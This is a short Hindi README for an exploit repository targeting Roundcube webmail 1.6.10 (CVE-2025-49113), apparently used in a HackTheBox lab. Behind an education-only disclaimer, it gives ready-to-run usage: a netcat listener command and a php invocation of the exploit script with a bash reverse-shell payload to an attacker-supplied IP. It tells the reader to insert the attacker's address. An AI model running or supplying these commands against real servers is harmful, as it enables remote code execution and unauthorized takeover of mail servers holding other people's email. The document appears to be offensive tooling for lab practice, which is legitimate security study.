
प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट Roundcube 1.6.10 (CVE-2025-49113) के लिए। वेबमेल इंटरफ़ेस के माध्यम से एक निर्मित PHP पेलोड के ज़रिए रिवर्स शेल प्रदान करता है।
⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए है।
सभी प्रदर्शन एक नियंत्रित लैब वातावरण में किए गए थे।
बिना स्पष्ट अनुमति के सिस्टम का अनधिकृत परीक्षण या शोषण अवैध और अनैतिक है। इस जानकारी के किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं है।
Roundcube PHP में लिखा गया एक व्यापक रूप से उपयोग किया जाने वाला, ब्राउज़र-आधारित IMAP ईमेल क्लाइंट है। यह वेबमेल एक्सेस के लिए एक उपयोगकर्ता-अनुकूल इंटरफ़ेस प्रदान करता है और आमतौर पर होस्टिंग प्रदाताओं, शैक्षणिक संस्थानों और आंतरिक एंटरप्राइज़ मेल सर्वरों द्वारा तैनात किया जाता है।
CVE-2025-49113 एक भेद्यता है जो Roundcube संस्करण 1.6.10 को प्रभावित करती है और एक प्रमाणित उपयोगकर्ता को वेबमेल इंटरफ़ेस के माध्यम से एक विशेष रूप से तैयार कमांड सबमिट करके रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है।
सफल शोषण के लिए मान्य उपयोगकर्ता क्रेडेंशियल्स की आवश्यकता होती है। एक बार शोषित होने के बाद, यह वेब सर्वर के संदर्भ के आधार पर सिस्टम-स्तरीय कमांड निष्पादन प्रदान करता है।
http://mail.outbound.htb4444 पर NetcatCVE-2025-49113.phpnc -nlvp 4444
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
🔧
<YOUR-IP>को अपने हमलावर के IP से बदलें।


मेरी Medium पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 Medium पर ब्लॉग पढ़ें